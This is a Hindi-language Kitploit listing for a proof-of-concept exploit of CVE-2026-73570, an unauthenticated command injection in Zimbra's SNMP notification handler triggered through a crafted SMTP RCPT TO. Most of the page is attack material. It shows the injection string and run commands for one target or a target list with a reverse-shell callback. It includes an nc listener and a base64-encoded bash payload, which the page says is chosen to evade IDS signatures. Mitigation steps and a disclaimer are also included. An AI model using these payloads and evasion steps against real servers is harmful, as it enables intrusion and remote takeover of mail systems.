Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-73570 — ज़िम्ब्रा SNMP अधिसूचना OS कमांड इंजेक्शन — SMTP शोषण के माध्यम से बिना प्रमाणीकरण के RCE (PoC) | Kitploit
उपकरण/GitHubGitHub/gabrielunknown/cve-2026-73570
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubgabrielunknown/cve-2026-73570

CVE-2026-73570

ज़िम्ब्रा SNMP अधिसूचना OS कमांड इंजेक्शन — SMTP शोषण के माध्यम से बिना प्रमाणीकरण के RCE (PoC)

रिपॉजिटरी देखें
11 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-73570 — Zimbra ZCS SNMP अधिसूचना RCE शोषण (PoC)

Zimbra Collaboration Suite SNMP अधिसूचना हैंडलर में OS कमांड इंजेक्शन के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन।


अवलोकन

फ़ील्डमान
CVECVE-2026-73570
CVSS 3.18.9 उच्च — AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
CWECWE-78 — OS कमांड में प्रयुक्त विशेष तत्वों का अनुचित निष्प्रभावीकरण
प्रभावितZimbra ZCS < 10.1.20 (zimbra-snmp स्थापित होने पर)
समाधानZCS 10.1.20 — जुलाई 2026
CISA KEV2026-08-21 को जोड़ा गया (FCEB उपचार की अंतिम तिथि: 2026-08-24)
प्रमाणीकरण आवश्यककोई नहीं
निष्पादन के रूप मेंzimbra OS उपयोगकर्ता

मूल कारण

वैकल्पिक zimbra-snmp पैकेज एक swatchdog नियम के साथ आता है जो /var/log/zimbra.log को निम्न से मेल खाती पंक्तियों के लिए ट्रैक करता है:

root@kitploit:~
Service status change: <NAME> changed from <STATE> to <STATE>

जब कोई मेल मिलता है, swatchdog कैप्चर किए गए <NAME> फ़ील्ड को बिना किसी स्वच्छता के सीधे SNMP अधिसूचना शेल स्क्रिप्ट में भेजता है।

एक बिना प्रमाणीकृत हमलावर एक विशेष रूप से तैयार SMTP RCPT TO कमांड भेजकर एक निर्मित लॉग प्रविष्टि इंजेक्ट कर सकता है। RFC 5321 उद्धृत स्थानीय-भाग का उपयोग करके, शेल मेटावर्ण — जैसे $(...) — <NAME> के अंदर एम्बेड किए जाते हैं और swatchdog परिणामी लॉग पंक्ति को संसाधित करते समय निष्पादित होते हैं।


पूर्व-शर्तें

लक्ष्य पर भेद्यता का शोषण करने के लिए तीनों शर्तें सत्य होनी चाहिए:

  • zimbra-snmp पैकेज स्थापित है
  • SNMP अधिसूचनाएं सक्षम हैं (snmp_notify = true)
  • swatchdog सेवा चल रही है

हमले का प्रवाह

root@kitploit:~
हमलावर                          Zimbra MTA
   │                                  │
   │── TCP कनेक्ट :25/:465/:587 ────►│
   │── EHLO mx-test.invalid ─────────►│
   │── MAIL FROM:<scanner@...> ──────►│
   │── RCPT TO:<"x: Service status    │
   │     change: localhost $(CMD)     │
   │     changed from stopped to      │
   │     running"@cve.invalid> ──────►│
   │                                  │── RCPT TO डेटा लॉग करता है ──► /var/log/zimbra.log
   │                                  │                               │
   │                                  │                         swatchdog पैटर्न से
   │                                  │                         मेल खाता है, $(CMD)
   │                                  │                         निकालता है, निष्पादित करता है
   │◄─────────── शेल कॉलबैक ───────────────────────────────────────┘
  1. पोर्ट 25 / 465 / 587 से कनेक्ट करें।
  2. हथियारबंद RCPT TO के साथ एक मानक SMTP संवाद भेजें।
  3. Zimbra स्वीकृति/अस्वीकृति के बावजूद पता डेटा लॉग करता है।
  4. swatchdog लॉग पैटर्न से मेल खाता है और इंजेक्ट किए गए $(CMD) को निकालता है।
  5. SNMP हैंडलर zimbra OS उपयोगकर्ता के रूप में CMD निष्पादित करता है।

शोषण

आवश्यकताएं

root@kitploit:~
cpan IO::Socket::SSL MIME::Base64 Digest::HMAC_MD5

एकल लक्ष्य

root@kitploit:~
perl zimbra-poc.pl -H mail.target.com -r <YOUR_IP> -R 4444

लक्ष्य सूची

root@kitploit:~
perl zimbra-poc.pl -f targets.txt -r <YOUR_IP> -R 4444

targets.txt — प्रति पंक्ति एक होस्ट, वैकल्पिक :port, # से शुरू होने वाली पंक्तियां अनदेखी की जाती हैं:

root@kitploit:~
mail.example.com
mail.example.com:25
10.0.0.50:587
# अनदेखी टिप्पणी

सभी विकल्प

फ़्लैगलंबाडिफ़ॉल्टविवरण
-H--host—एकल लक्ष्य होस्टनाम या IP
-f--file—लक्ष्य सूची वाली फ़ाइल
-p--port587डिफ़ॉल्ट SMTP पोर्ट
-r--rhost—रिवर्स शेल कॉलबैक के लिए आपका IP
-R--rport4444लिसनर पोर्ट
-t--timeout15सेकंड में सॉकेट टाइमआउट
-S--sslबंदप्रत्यक्ष TLS (पोर्ट 465 पर स्वतः सक्षम)
-v--verboseबंदपूर्ण SMTP संवाद प्रिंट करें
-L--logfile—सत्र लॉग फ़ाइल में लिखें
-h--help—सहायता दिखाएं

पूर्ण उदाहरण

root@kitploit:~
# टर्मिनल 1 — लिसनर शुरू करें
nc -lvnp 4444

# टर्मिनल 2 — शोषण चलाएं
perl zimbra-poc.pl -H mail.target.com -r 10.10.10.1 -R 4444 -v

पेलोड तकनीक

रिवर्स शेल कमांड इंजेक्शन से पहले base64-एन्कोडेड होता है:

root@kitploit:~
echo <b64>|base64 -d|bash

यह IDS/IPS को /dev/tcp, bash -i, या nc -e जैसे सादे पाठ हस्ताक्षरों से मेल खाने से रोकता है। एन्कोडेड ब्लॉब को RCPT TO के उद्धृत स्थानीय-भाग के अंदर $(...) के रूप में इंजेक्ट किया जाता है, जो swatchdog लॉग प्रविष्टि को संसाधित करते समय सर्वर-साइड निष्पादन को ट्रिगर करता है।


शमन

कार्रवाईविवरण
पैचZimbra ZCS ≥ 10.1.20 में अपग्रेड करें
SNMP अधिसूचना अक्षम करेंzmprov mcf zimbraSnmpNotifyEnabled FALSE && zmconfigdctl restart
पैकेज हटाएंapt remove zimbra-snmp / yum remove zimbra-snmp
नेटवर्क नियंत्रणजहां परिचालन रूप से संभव हो, इनबाउंड SMTP (25/465/587) को विश्वसनीय रिले तक सीमित करें

संदर्भ

  • NVD — CVE-2026-73570
  • Zimbra सुरक्षा सलाहकार
  • CISA ज्ञात शोषित भेद्यताएं — CVE-2026-73570
  • CERT.pl सलाहकार
  • BiuTrap/CVE-2026-73570

अस्वीकरण

यह प्रूफ-ऑफ-कॉन्सेप्ट केवल अधिकृत सुरक्षा परीक्षण, शैक्षणिक अनुसंधान और रक्षात्मक उद्देश्यों के लिए जारी किया गया है।
इसे उन प्रणालियों के विरुद्ध चलाना जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है, अवैध है।
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए कोई दायित्व नहीं लेता है।

टूल डाउनलोड करें